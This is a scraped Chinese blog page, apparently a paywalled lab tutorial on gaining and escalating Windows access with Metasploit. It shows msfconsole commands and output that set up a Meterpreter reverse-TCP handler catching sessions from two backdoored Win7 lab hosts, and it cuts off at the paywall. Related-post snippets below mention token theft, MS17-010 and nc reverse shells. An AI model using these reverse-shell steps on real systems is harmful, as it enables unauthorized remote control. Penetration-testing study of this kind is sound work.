MSF提权操作

最新推荐文章于 2024-04-22 18:53:31 发布
VIP文章 最新推荐文章于 2024-04-22 18:53:31 发布
阅读量1.1k 收藏 4
点赞数 2
分类专栏: 网络安全 文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40549070/article/details/109381244
版权

最近有个问题苦恼了我很久,“msf”是否可以控制多台服务器,怎么通过“msf”进行提权操作?

这里我直接开启了两台win7SP1X64的主机,通过运行后门的方式获得shell,这里生成shell的步骤略过。

获得服务器shell

首先我们在kali里面开启msf并调用exploit/multi/handler

msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.142.19
lhost => 192.168.142.19
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.142.19:4444 
msf5 exploit(multi/handler) > [*] Sending stage (176195 bytes) to 192.168.142.24
[*] Meterpreter session 1 opened (192.168.142.19:4444 -> 192.168.142.24:52612) at 2020-10-30 10:15:32 +0800

msf5 exploit(multi/handler) > 
[*] Sending stage (176195 bytes) to 192.168.142.101
[*] Meterpreter session 2 opened (192.168.142.19:4444 ->
最低0.47元/天 解锁文章
快吃小蛋糕吧
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
2、(权限提升)进入Meterpreter后的攻击方式小结
daxi0ng的博客
03-15 1533
##使用getsystem提权失败的话,可以使用WMIC工具进行提权准备,使用提权模块进行提权,如MS16-032,本次进入的就是system权限。 令牌窃取 令牌简介及原理 令牌 (Token) 就是系统的临时密钥, 相当于账户名和密码, 用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。 它允许你在不提供密码或其他凭证的前提下, 访问网络和系统资源。 这些令牌将持续存在于系统中, 除...
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2169
提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
喜欢Python编程的程序员柚柚呀
04-22 468
​​MSF Windows提权​​​​反弹shell​​​​提权​​​​END推荐阅读​​​​MSF Linux提权​​​​反弹shell​​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
利用MS17-010渗透win7(32位)
1stPeak's Blog
06-07 2万+
MS17-010就是我们常说的永恒之蓝漏洞 1.首先我们测试目标系统是否存在该漏洞 2.永恒之蓝漏洞利用前的准备与之后的实施 3.问题总结 4.如果使用该模块攻击win7x64注意事项 这篇文章主要写的是对win7(x86)系统的渗透,x64的请点击这里利用MS17-010渗透win7(64位),我们这里的环境是攻击者(IP:192.168.1.222),靶机(IP:192.168.1.221)...
[-] Handler failed to bind to x.x.x.x:port排错
1stPeak's Blog
02-18 1万+
报错: 原因: Kali的IP已经更换了,重新获取IP:ifconfig 如若还不行,重启msfconsole,再ifconfig,重新设置参数
meterpreter之getsystem命令提权详解
redwand的博客
07-23 7280
meterpreter shell是msf上集成的一组功能强大的shell集合,当我们获取一个反弹的meterpreter shell时,可以轻松的通过各种命令对靶机进行控制。熟悉的meterpreter的同学都清楚,其中有一个getsystem命令,帮助文档说明是提权用的,没有更详细的说明,很多人会误解为这是meterpreter的一键提权工具,但每次输入这个命令,都会爆出各种“incorrect“和”denied“,本文将通过理论和实验说明此命令的适用环境及提权过程。
msf提权操作
帅醉了的博客
03-07 2411
愿疫情早日结束,重返校园奋斗 使用getsystem来获得最高权限 getsystem 发现却爆出这样的错误 [-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted: [-] Named Pipe Impersonation (In Memory...
[我的作死案例]图书馆泡妹记 上
wjy397的专栏
06-28 3156
https://bbs.ichunqiu.com/thread-24168-1-1.html 吾本布衣i春秋-呆萌菜鸟 发表于前天14:28253388 本帖最后由 0nise 于 2017-6-26 10:14 编辑 缘起缘落:简单来说,图书馆看见一个妹子长得还不错,然后...
基于Metasploit完成Samba服务漏洞复现
linxaiomo
03-10 7577
实验环境: 靶机ip:192.168.31.182(下载链接: https://pan.baidu.com/s/1ia-DD8UPDhIkWUd2eJWoKg?pwd=cykq 提取码: cykq 复制这段内容后打开百度网盘手机App,操作更方便哦) 攻击机ip:192.168.31.166(X64) 一:主机发现 arp-scan -l #扫描同一网段下的主机 可以看到靶机的IP地址和mac地址,Vmware为虚拟机 2.漏洞扫描 nmap 192.168.31.182.
使用msfconsole常见问题解决
Amdy_amdy的博客
08-23 1万+
问题总结: (其中有我遇到的问题,有我没有遇到的,但我这里总结了一下别人遇到的,未雨绸缪)问题一(这个我也遇到过,不过我安装了上面的win 32就没问题了):原因:这个因为没有/root/.wine目录,执行以下命令即可创建该目录 wine cmd.exe 问题二(我没有遇到):原因:wine在使用过程中会出现图形化界面,这就需要这个基于Mozilla的Gecko渲染引擎来呈现,手动安装所需版本的wine-gecko即可。我们首先下载Wine提供的MSI二进制文件,请注意下载32位版本的,因为我
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayloadmsfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
kali 渗透msf
11-14
kali渗透测试利器
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
Metasploit使用
dzqxwzoe的博客
08-14 359
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。Pivot模块其实就是跳板机,这里我是macos的环境,虚拟环境配置起来会非常的麻烦,简单地说就是域内有一个台主机有两张网卡,分别连不同的网段,我们kali现在只能打到一个网段,但是现在发现还有一个其他的网段,这时候就起作用了。
20154312《网络对抗》Exp2 后门原理与实践
weixin_30781775的博客
03-24 206
常见问题快速链接 Handler failed to bind to xxx.xxx.xx.xxx:xxxx 使用Webcam_snap命令提示1411错误,无法正常拍照 常用后门工具实践 Windows获得Linux Shell Windows:使用ipconfig指令查看本机IP: 使用ncat.exe程序监听本机的4312端口: Kali:使用nc指令的-e选项反向连...
ElasticSearch启动过程错误:org.elasticsearch.transport.BindTransportException: Failed to bind to [9300-9400
热门推荐
chenxb1986的博客
11-19 3万+
[2018-11-20T06:38:34,516][ERROR][o.e.b.Bootstrap ] [es-node] Exception org.elasticsearch.transport.BindTransportException: Failed to bind to [9300-9400] at org.elasticsearch.transport.TcpTra...
BindTransportException: Failed to bind to [9300]
程裕强的专栏
02-12 5694
1、异常信息 [2019-02-12T15:50:30,496][INFO ][o.e.n.Node ] [elastic1] starting ... [2019-02-12T15:50:30,775][WARN ][o.e.b.ElasticsearchUncaughtExceptionHandler] [elastic1] uncaught exception i...
msf linux 提权
09-12
掌握Linux操作系统的内部工作原理、用户权限管理和漏洞利用技术将对你进行提权操作非常有帮助。 总结来说,我的目的是确保信息安全和合规性,所以我不能在这里提供关于提权的具体指导。如果你有合法的需求,请参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值